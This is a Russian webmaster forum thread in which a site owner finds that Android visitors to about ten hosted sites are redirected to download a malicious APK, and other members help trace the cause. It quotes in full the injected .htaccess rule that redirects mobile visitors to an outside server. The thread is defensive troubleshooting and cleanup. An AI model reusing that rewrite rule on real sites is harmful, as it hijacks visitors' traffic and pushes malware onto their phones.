- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Предлагает скачать мобильную версию mobilnaya_versiya.apk если заходишь на сайт с андроид устройств. С виндовс все нормально. И так по всем сайтам на хостинге (около 10). Вот пример одного из них disum.ru.
Проверял на вирусы через хостера - ничего не нашел.
Подозрительно то, сегодня одновременно в 14:20 на нескольких сайтах был изменен файл .htaccess
Но на большинстве сайтов вообще не было никаких изменений файлов (если верить last modified)
Код редиректа обычно ставят в файл .htaccess
Файл .htaccess с редиректом необязательно должен быть в корне сайта, он моржет находиться на уровень выше в директории www или выше.
Редирект происходит на сайт http://mobvs.ru/e/6746
адрес ПП найти не удалось, точнее лень перебирать все адреса ПП
можете сами перебрать
http://bgp.he.net/ip/91.202.63.75#_dns
Отпишите в личку, помогу
он свежерег, ему нельзя писать в личку
Контакты в моем профиле указаны.
Единственная ссылка, которую я нашел в .htaccess это http://server.7od.org/?update&source=%
Но она есть во всех файлах, даже тех которые не менялись.
---------- Добавлено 04.04.2014 в 00:41 ----------
А, точно. Удалил строку со ссылкой RewriteRule ^(.*)$ http://server.7od.org/?update&source=%{HTTP_HOST} [L,R=302]
И все заработало!
Теперь бегу пароли на хостинг и MySQL менять. Или как еще эта гадость проникает?
шелл-скрипты ищите, строка с редиректом - это результат, а надо найти причину!!!
ай-болитом проверьте...
Это ПП mobilabs.biz напишите саппорту, предоставьте ссылку http://mobvs.ru/e/6746 и забанят этого нехорошего человека.
Теперь бегу пароли на хостинг и MySQL менять. Или как еще эта гадость проникает?
Смена паролей от всего + возможно сам хост может влиять на взлом.
В результате рег.ру таки увидел на сайтах вирусы. Все в htaccess. Удалил во всех файлах вредоносный код. Второй день все тихо и спокойно.
Теперь и с этим зверем знаком. А то до этого только спам боты селились)
Спасибо всем за помощь!🍻
В .htaccess скорее всего стоит мобильный редирект. Либо шелл, либо по ftp увели пароли. Просканируйте сайт AI-BOLIT'ом http://revisium.com/ai/ и проверьте по дате изменения файлов доступ к .htaccess в ftp логе (его можно запросить в тех поддержке хостинга)